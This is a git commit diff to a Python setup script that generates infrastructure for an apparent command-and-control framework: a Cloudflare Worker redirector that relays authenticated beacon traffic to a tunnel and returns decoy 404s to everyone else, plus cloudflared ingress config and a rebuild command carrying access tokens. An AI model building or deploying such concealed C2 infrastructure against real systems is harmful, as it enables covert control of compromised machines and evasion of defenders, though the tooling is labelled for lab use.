cdn: tunnel ingress uses tunnel_host (was hardcoded, 404'd every deployment), recreate line carries tunnel_host + cf access tokens, worker.js header carries the deploy step

This commit is contained in:
JYenn
2026-08-18 00:19:58 +01:00
parent c5a859ba82
commit 9fe60da236
+13 -4
View File
@@ -332,6 +332,10 @@ def write_worker(c: Config) -> str:
"// Valid requests (matching the auth header) are relayed to the tunnel\n"
"// hostname with the Zero Trust service-auth headers attached; anything\n"
"// else gets a decoy 404.\n"
"//\n"
"// Deploy: wrangler deploy deploy/worker.js\n"
"// Then point setup.py's BEACON_URL at the deployed worker and run the\n"
"// tunnel (see cloudflared-config.yml in this directory).\n"
"const AUTH_HEADER = %r;\n"
"const AUTH_SECRET = %r;\n"
"const TUNNEL_HOST = %r;\n"
@@ -379,10 +383,10 @@ def write_tunnel(c: Config) -> str:
"# credentials-file: /root/.cloudflared/<TUNNEL-UUID>.json\n"
"\n"
"ingress:\n"
" - hostname: c2.yourdomain.com\n"
" - hostname: %s\n"
" service: http://localhost:%d\n"
" - service: http_status:404\n"
% int(c.lport),
% (c.tunnel_host, int(c.lport)),
encoding="utf-8",
)
return str(p)
@@ -482,8 +486,13 @@ def report(c: Config, files: list) -> None:
c.transport, c.lhost or "", int(c.lport), c.out, fmt, stage,
"" if c.build else " --no-build"))
if c.transport == "https_cdn":
print(" python setup.py -t %s BEACON_URL=%s AUTH_SECRET=%s OUT=%s -g" % (
c.transport, c.beacon_url, c.auth_secret, c.out))
extra = " TUNNEL_HOST=%s" % c.tunnel_host
if c.cf_access_client_id:
extra += " CF_ACCESS_CLIENT_ID=%s CF_ACCESS_CLIENT_SECRET=%s" % (
c.cf_access_client_id, c.cf_access_client_secret)
print(" python setup.py -t %s BEACON_URL=%s AUTH_SECRET=%s OUT=%s%s%s" % (
c.transport, c.beacon_url, c.auth_secret, c.out, extra,
"" if c.build else " --no-build"))
print("[!] Authorized lab use only.")